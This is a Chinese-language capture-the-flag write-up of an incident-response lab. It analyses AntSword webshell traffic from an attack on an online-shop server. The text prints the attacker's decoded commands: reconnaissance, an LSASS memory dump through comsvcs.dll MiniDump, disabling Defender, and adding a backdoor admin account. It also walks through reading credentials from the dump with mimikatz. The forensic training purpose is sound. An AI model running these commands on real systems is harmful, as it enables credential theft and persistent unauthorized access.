目录
一、测试环境
二、测试目的
三、操作过程
Flag1
Flag2
Flag3
四、结论
一、测试环境
靶场介绍:国内厂商设置的玄机靶场,以应急响应题目著名。
地址:https://xj.edisec.net/challenges/44
靶机简介:
二、测试目的
对附件数据包进行流量分析,按照题目要求找出对应的flag并提交。
三、操作过程
Flag1
进行流量分析,过滤http流量,发现product2.php是webshell流量
蚁剑使用的是base64加密,其中密文前两位是混淆字符,需要将每个包的命令执行语句进行解码,分析命令,找寻线索
所有命令解码如下:
C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql
cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&ls&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /priv&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&systeminfo&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain group” /domain&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain admins” /domain&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net view&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net share&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&ls&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”© store.php c:\temp&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
C:/Temp/OnlineShopBack.zip
cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&dir c:\windows\system32&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\windows\config&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators admin /add&echo [S]&cd&echo [E]
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /all&echo [S]&cd&echo [E]
在length为4146的webshell流量包中,解码得到了创建admin账户的命令
解码得到密码:Password1
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]
Flag1:flag{Password1}
Flag2
在length为4172的webshell流量包中,解码得到了LSASS.exe的程序进程id,这也是命令中唯一的id号
rundll32.exe 可用于执行 DLL 文件,也能调用该文件中的内部函数,这里就调用了comsvcs.dll中的MiniDump函数。
Comsvcs.dll的minidump函数可以创建内存转储文件,包含了系统内存的快照,可能包含敏感信息,攻击者使用这个函数获取身份验证信息。
而LSASS.exe进程,负责本地安全策略以及用户身份验证。经常成为攻击者的目标。因此这条命令正是调用该进程的命令,进程id是852
cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
Flag2:flag{852}
Flag3
根据对命令执行的分析,攻击者导出身份验证信息在文件:C:\temp\OnlineShopBackup.zip
可以将http流量包导出,分离出该文件。从最大的文件开始导出分析,导出为dmp文件
由于是蚁剑流量,文件头有多余字节,需要将文件头的e1c1709删除。删除后就是dmp文件的特征。(如果发现mimikatz没报错,也没读取成功,就重新导出,先保存为php文件,删除多余字符后保存为dmp文件试试)
mimikatz的GitHub地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip 使用mimikatz识别dmp文件,需要注意:mimikatz管理员权限启动;mimikatz的版本是2022,不然也解密不出;
sekurlsa::minidump mima.dmp
sekurlsa::logonpasswords成功读取信息,win101的NTML:282d975e35846022476068ab5a3d72df
解密得到用户win101的密码:admin#123
Flag3:flag{admin#123}
四、结论
流量分析的操作有时候很枯燥,但是不可或缺。需要耐心完成工作,确保不遗漏信息。
熟悉了获取主机身份信息的命令,以及mimikatz工具的使用方法。